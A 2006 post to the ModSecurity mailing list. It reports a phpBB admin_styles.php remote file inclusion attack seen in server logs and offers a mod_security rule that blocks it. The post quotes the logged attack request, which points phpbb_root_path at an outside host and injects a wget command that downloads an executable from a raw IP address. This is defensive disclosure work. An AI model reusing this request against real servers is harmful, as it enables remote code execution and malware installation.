[Modsecurity] yet another phpBB exploit
Ryan E. Helfter
rhelfter at datapipe.com
Mon Jun 26 16:56:24 EDT 2006
Not sure if this made it in yet.
Yet another phpBB bug:
"GET//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.b
nfxtools.com/tool25.dat?&cmd=wget%20201.32.144.237//7936825.exe
HTTP/1.1" 200 11909
The following mod_security rules now takes care of this:
# WEB-PHP phpbb admin_styles.php arbitrary command attempt
SecFilterSelective REQUEST_URI "/admin_styles\.php" chain
SecFilter "phpbb_root_path="
Regards,
--
Ryan E. Helfter
UNIX Security Engineer
DataPipe Managed Hosting Services
- What It Means To Be Sure -
rhelfter at datapipe.com | http://www.datapipe.com
Tel: 201.792.1918 x300 | Fax: 201-792-3090
More information about the Modsecurity
mailing list